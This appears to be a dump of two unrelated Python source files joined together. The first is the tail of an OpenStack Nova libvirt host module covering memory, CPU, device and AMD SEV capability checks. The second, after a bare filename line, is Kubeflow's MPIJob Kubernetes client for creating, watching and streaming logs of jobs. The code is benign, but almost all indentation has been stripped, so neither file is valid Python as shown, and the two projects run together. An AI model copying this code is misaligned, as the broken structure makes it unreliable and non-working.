return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
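    # Worked example (illustrative numbers, in kB): with /proc/meminfo reporting
    #   MemFree: 2048000   Buffers: 512000   Cached: 1024000
    # the helper above returns 2048000 + 512000 + 1024000 = 3584000 kB, which
    # callers such as get_memory_mb_used() convert to MiB with "// units.Ki".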
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
        # getInfo() returns a list of details about the host node;
        # index 3 is the CPU frequency in MHz.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
                    # take the mount options field and split it into options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
mpi_job_client.py
# Copyright 2021 The Kubeflow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import logging
import threading
import queue
from kubernetes import client, config
from kubernetes import watch as k8s_watch
from kubeflow.training.constants import constants
from kubeflow.training.utils import utils
from .mpi_job_watch import watch as mpijob_watch
logging.basicConfig(format='%(message)s')
logging.getLogger().setLevel(logging.INFO)
def wrap_log_stream(q, stream):
while True:
try:
logline = next(stream)
q.put(logline)
except StopIteration:
q.put(None)
return
except Exception as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
def get_log_queue_pool(streams):
pool = []
for stream in streams:
q = queue.Queue(maxsize=100)
pool.append(q)
threading.Thread(target=wrap_log_stream, args=(q, stream)).start()
return pool
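# Illustrative use of the two helpers above (pod names and namespace are
# hypothetical): each log stream gets a reader thread feeding a bounded queue,
# so several pods can be followed without blocking on any single stream.
#
#   streams = [k8s_watch.Watch().stream(client.CoreV1Api().read_namespaced_pod_log,
#                                       name=pod, namespace="default")
#              for pod in ("pi-mpijob-launcher", "pi-mpijob-worker-0")]
#   for q in get_log_queue_pool(streams):
#       line = q.get(timeout=1)   # a None item marks the end of that stream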
class MPIJobClient(object):
def __init__(self, config_file=None, context=None, # pylint: disable=too-many-arguments
client_configuration=None, persist_config=True):
"""
MPIJob client constructor
:param config_file: kubeconfig file, defaults to ~/.kube/config
:param context: kubernetes context
:param client_configuration: kubernetes configuration object
:param persist_config:
"""
if config_file or not utils.is_running_in_k8s():
config.load_kube_config(
config_file=config_file,
context=context,
client_configuration=client_configuration,
persist_config=persist_config)
else:
config.load_incluster_config()
self.custom_api = client.CustomObjectsApi()
self.core_api = client.CoreV1Api()
def create(self, mpijob, namespace=None):
"""
Create the MPIJob
:param mpijob: mpijob object
:param namespace: defaults to current or default namespace
:return: created mpijob
"""
if namespace is None:
namespace = utils.set_mpijob_namespace(mpijob)
try:
outputs = self.custom_api.create_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
mpijob)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->create_namespaced_custom_object:\
%s\n" % e)
return outputs
def get(self, name=None, namespace=None, watch=False,
timeout_seconds=600): # pylint: disable=inconsistent-return-statements
"""
Get the mpijob
        :param name: existing mpijob name; if not defined, get all mpijobs in the namespace.
:param namespace: defaults to current or default namespace
:param watch: Watch the MPIJob if `True`.
        :param timeout_seconds: How long to watch the job.
:return: mpijob
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
if name:
if watch:
mpijob_watch(
name=name,
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
thread = self.custom_api.get_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
name,
async_req=True)
mpijob = None
try:
mpijob = thread.get(constants.APISERVER_TIMEOUT)
except multiprocessing.TimeoutError:
raise RuntimeError("Timeout trying to get MPIJob.")
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->get_namespaced_custom_object:\
%s\n" % e)
except Exception as e:
raise RuntimeError(
"There was a problem to get MPIJob {0} in namespace {1}. Exception: \
{2} ".format(name, namespace, e))
return mpijob
else:
if watch:
mpijob_watch(
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
thread = self.custom_api.list_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
async_req=True)
mpijobs = None
try:
mpijobs = thread.get(constants.APISERVER_TIMEOUT)
except multiprocessing.TimeoutError:
raise RuntimeError("Timeout trying to get MPIJob.")
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->list_namespaced_custom_object:\
%s\n" % e)
except Exception as e:
raise RuntimeError(
"There was a problem to list MPIJobs in namespace {0}. \
Exception: {1} ".format(namespace, e))
return mpijobs
def patch(self, name, mpijob, namespace=None):
"""
Patch existing mpijob
:param name: existing mpijob name
:param mpijob: patched mpijob
:param namespace: defaults to current or default namespace
:return: patched mpijob
"""
if namespace is None:
namespace = utils.set_mpijob_namespace(mpijob)
try:
outputs = self.custom_api.patch_namespaced_custom_object(
constants.MPIJOB_GROUP,
constants.MPIJOB_VERSION,
namespace,
constants.MPIJOB_PLURAL,
name,
mpijob)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->patch_namespaced_custom_object:\
%s\n" % e)
return outputs
def delete(self, name, namespace=None):
"""
Delete the mpijob
:param name: mpijob name
:param namespace: defaults to current or default namespace
:return:
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
try:
return self.custom_api.delete_namespaced_custom_object(
group=constants.MPIJOB_GROUP,
version=constants.MPIJOB_VERSION,
namespace=namespace,
plural=constants.MPIJOB_PLURAL,
name=name,
body=client.V1DeleteOptions())
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CustomObjectsApi->delete_namespaced_custom_object:\
%s\n" % e)
def wait_for_job(self, name, # pylint: disable=inconsistent-return-statements
namespace=None,
timeout_seconds=600,
polling_interval=30,
watch=False,
status_callback=None):
"""Wait for the specified job to finish.
        :param name: Name of the MPIJob.
:param namespace: defaults to current or default namespace.
:param timeout_seconds: How long to wait for the job.
:param polling_interval: How often to poll for the status of the job.
:param watch: Watch the MPIJob if `True`.
:param status_callback: (Optional): Callable. If supplied this callable is
invoked after we poll the job. Callable takes a single argument which
is the job.
:return:
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
if watch:
mpijob_watch(
name=name,
namespace=namespace,
timeout_seconds=timeout_seconds)
else:
return self.wait_for_condition(
name,
["Succeeded", "Failed"],
namespace=namespace,
timeout_seconds=timeout_seconds,
polling_interval=polling_interval,
status_callback=status_callback)
def wait_for_condition(self, name,
expected_condition,
namespace=None,
timeout_seconds=600,
polling_interval=30,
status_callback=None):
"""Waits until any of the specified conditions occur.
:param name: Name of the job.
:param expected_condition: A list of conditions. Function waits until any of the
supplied conditions is reached.
:param namespace: defaults to current or default namespace.
:param timeout_seconds: How long to wait for the job.
:param polling_interval: How often to poll for the status of the job.
:param status_callback: (Optional): Callable. If supplied this callable is
invoked after we poll the job. Callable takes a single argument which
is the job.
:return: Object MPIJob status
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
        mpijob = None
        for _ in range(round(timeout_seconds / polling_interval)):
            mpijob = self.get(name, namespace=namespace)
if mpijob:
if status_callback:
status_callback(mpijob)
                # If we poll the CRD quickly enough, the status may not have been set yet.
conditions = mpijob.get("status", {}).get("conditions", [])
# Conditions might have a value of None in status.
conditions = conditions or []
for c in conditions:
if c.get("type", "") in expected_condition:
return mpijob
time.sleep(polling_interval)
raise RuntimeError(
"Timeout waiting for MPIJob {0} in namespace {1} to enter one of the "
"conditions {2}.".format(name, namespace, expected_condition), mpijob)
def get_job_status(self, name, namespace=None):
"""Returns MPIJob status, such as Running, Failed or Succeeded.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: Object MPIJob status
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
mpijob = self.get(name, namespace=namespace)
        # Guard against a missing, empty or None conditions list in status.
        conditions = mpijob.get("status", {}).get("conditions") or [{}]
        return conditions[-1].get("type", "")
def is_job_running(self, name, namespace=None):
"""Returns true if the MPIJob running; false otherwise.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: True or False
"""
mpijob_status = self.get_job_status(name, namespace=namespace)
return mpijob_status.lower() == "running"
def is_job_succeeded(self, name, namespace=None):
"""Returns true if the MPIJob succeeded; false otherwise.
:param name: The MPIJob name.
:param namespace: defaults to current or default namespace.
:return: True or False
"""
mpijob_status = self.get_job_status(name, namespace=namespace)
return mpijob_status.lower() == "succeeded"
def get_pod_names(self, name, namespace=None, master=False, # pylint: disable=inconsistent-return-statements
replica_type=None, replica_index=None):
"""
Get pod names of MPIJob.
:param name: mpijob name
:param namespace: defaults to current or default namespace.
        :param master: Only get the pod with label 'job-role: master' if True.
        :param replica_type: User can specify one of 'worker, ps, chief' to only get pods of that type.
        By default get pods of all types.
        :param replica_index: User can specify a replica index to get one pod of the MPIJob.
:return: set: pods name
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
labels = utils.get_job_labels(name, master=master,
replica_type=replica_type,
replica_index=replica_index)
try:
resp = self.core_api.list_namespaced_pod(
namespace, label_selector=utils.to_selector(labels))
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
pod_names = []
for pod in resp.items:
if pod.metadata and pod.metadata.name:
pod_names.append(pod.metadata.name)
if not pod_names:
logging.warning("Not found Pods of the MPIJob %s with the labels %s.", name, labels)
else:
return set(pod_names)
def get_logs(self, name, namespace=None, master=True,
replica_type=None, replica_index=None,
follow=False, container="mpi"):
"""
Get training logs of the MPIJob.
By default only get the logs of Pod that has labels 'job-role: master'.
:param container: container name
:param name: mpijob name
:param namespace: defaults to current or default namespace.
        :param master: Only get the pod with label 'job-role: master' if True.
        Set False to get logs from more Pods.
        :param replica_type: User can specify one of 'worker, ps, chief' to only get pods of that type.
        By default get pods of all types.
        :param replica_index: User can specify a replica index to get one pod of the MPIJob.
:param follow: Follow the log stream of the pod. Defaults to false.
:return: str: pods logs
"""
if namespace is None:
namespace = utils.get_default_target_namespace()
pod_names = list(self.get_pod_names(name, namespace=namespace,
master=master,
replica_type=replica_type,
replica_index=replica_index))
if pod_names:
if follow:
log_streams = []
for pod in pod_names:
log_streams.append(k8s_watch.Watch().stream(self.core_api.read_namespaced_pod_log,
name=pod, namespace=namespace, container=container))
finished = [False for _ in log_streams]
# create thread and queue per stream, for non-blocking iteration
log_queue_pool = get_log_queue_pool(log_streams)
                # iterate over every watched pod's log queue
while True:
for index, log_queue in enumerate(log_queue_pool):
if all(finished):
return
if finished[index]:
continue
                        # group every 50 log lines of the same pod together
for _ in range(50):
try:
logline = log_queue.get(timeout=1)
if logline is None:
finished[index] = True
break
logging.info("[Pod %s]: %s", pod_names[index], logline)
except queue.Empty:
break
else:
for pod in pod_names:
try:
pod_logs = self.core_api.read_namespaced_pod_log(pod, namespace, container=container)
logging.info("The logs of Pod %s:\n %s", pod, pod_logs)
except client.rest.ApiException as e:
raise RuntimeError(
"Exception when calling CoreV1Api->read_namespaced_pod_log: %s\n" % e)
else:
raise RuntimeError("Not found Pods of the MPIJob {} "
"in namespace {}".format(name, namespace))